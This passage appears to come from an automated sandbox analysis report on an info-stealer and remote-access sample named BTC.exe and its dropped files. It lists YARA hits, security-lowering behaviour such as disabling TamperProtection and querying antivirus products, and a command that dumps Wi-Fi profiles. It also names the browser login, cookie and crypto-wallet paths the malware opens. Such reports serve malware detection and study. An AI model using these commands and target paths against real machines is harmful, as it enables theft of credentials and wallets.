                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe VolumeInformation
                            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Users\user\AppData\Roaming\Window Security.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Users\user\AppData\Roaming\Window Security.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\Desktop\BTC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            Source: Yara match | File source: 0.2.BTC.exe.2c8fa48.3.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 3.0.Cracked.exe.d80000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 3.2.Cracked.exe.310b0a8.1.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 3.2.Cracked.exe.310b0a8.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000003.00000000.2004809524.0000000000D82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\Cracked.exe, type: DROPPED
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, type: DROPPED
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Source: Yara match | File source: Process Memory Space: Cracked.exe PID: 5524, type: MEMORYSTR
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Registry value created: TamperProtection 0
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                            Source: BTC.exe, 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.00000000034AC000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000000.2004809524.0000000000D82000.00000002.00000001.01000000.00000007.sdmp, Windows Security Health Service.exe, 0000001A.00000002.4466271061.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe.0.dr, Windows Security Health Service.exe.3.dr | Binary or memory string: MSASCui.exe
                            Source: BTC.exe, 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.00000000034AC000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000000.2004809524.0000000000D82000.00000002.00000001.01000000.00000007.sdmp, Windows Security Health Service.exe, 0000001A.00000002.4466271061.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe.0.dr, Windows Security Health Service.exe.3.dr | Binary or memory string: procexp.exe
                            Source: svchost.exe, 00000004.00000002.4463794496.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000005.00000002.4556173792.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, Windows Defender Service Host.exe, 00000007.00000002.4547475087.000000001CE21000.00000004.00000020.00020000.00000000.sdmp, Windows Defender Service Host.exe, 00000007.00000002.4547475087.000000001CDED000.00000004.00000020.00020000.00000000.sdmp, Windows Defender Service Host.exe, 00000007.00000002.4537546476.000000001C141000.00000004.00000020.00020000.00000000.sdmp, Windows Defender Service Host.exe, 00000007.00000002.4455411740.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, Windows Defender Service Host.exe, 00000007.00000002.4537546476.000000001C0F0000.00000004.00000020.00020000.00000000.sdmp, Windows Defender Service Host.exe, 00000007.00000002.4537546476.000000001C1A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: BTC.exe, 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.00000000034AC000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000000.2004809524.0000000000D82000.00000002.00000001.01000000.00000007.sdmp, Windows Security Health Service.exe, 0000001A.00000002.4466271061.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe.0.dr, Windows Security Health Service.exe.3.dr | Binary or memory string: MsMpEng.exe
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\update.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

                            Source: Yara match | File source: 2.0.crack.exe.440000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000002.00000000.2003529884.0000000000442000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: crack.exe PID: 5972, type: MEMORYSTR
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\crack.exe, type: DROPPED
                            Source: Yara match | File source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Source: Yara match | File source: 0.2.BTC.exe.2c80488.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.2.BTC.exe.2c75848.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: BTC.exe PID: 2796, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: Windows Defender Service Host.exe PID: 7140, type: MEMORYSTR
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Source: Yara match | File source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPED
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPED
                            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                            Source: Yara match | File source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000004.00000002.4469429984.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000002.4469944759.0000000003575000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000002.4469944759.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Source: Yara match | File source: 0.2.BTC.exe.2c80488.2.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.2.BTC.exe.2c75848.1.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 7.0.Windows Defender Service Host.exe.f60000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.2.BTC.exe.2c80488.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.2.BTC.exe.2c75848.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000007.00000000.2009427541.0000000000F62000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: BTC.exe PID: 2796, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: Windows Defender Service Host.exe PID: 7140, type: MEMORYSTR
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, type: DROPPED
                            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Electrum
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $]q5\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: \Exodus\exodus.wallet
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: \Ethereum\keystore
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Exodus
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Ethereum
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: \Coinomi\Coinomi\wallets
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: \Ethereum\keystore
                            Source: C:\Users\user\AppData\Roaming\update.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Users\user\AppData\Roaming\update.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                            Source: C:\Users\user\AppData\Roaming\update.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                            Source: C:\Users\user\AppData\Roaming\update.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                            Source: C:\Users\user\AppData\Roaming\update.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                            Source: C:\Users\user\AppData\Roaming\update.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                            Source: C:\Users\user\AppData\Roaming\update.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Users\user\AppData\Roaming\update.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Roaming\update.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: Yara match | File source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: Window Security.exe PID: 2680, type: MEMORYSTR
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPED
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPED

                            Remote Access Functionality

Source: Yara match, File source: 2.0.crack.exe.440000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000000.2003529884.0000000000442000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: crack.exe PID: 5972, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\AppData\Roaming\crack.exe, type: DROPPED
Source: Yara match, File source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match, File source: 0.2.BTC.exe.2c80488.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.BTC.exe.2c75848.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: BTC.exe PID: 2796, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: Windows Defender Service Host.exe PID: 7140, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match, File source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match, File source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPED
Source: Yara match, File source: sslproxydump.pcap, type: PCAP
Source: Yara match, File source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.4469429984.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.4469944759.0000000003575000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.4469944759.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
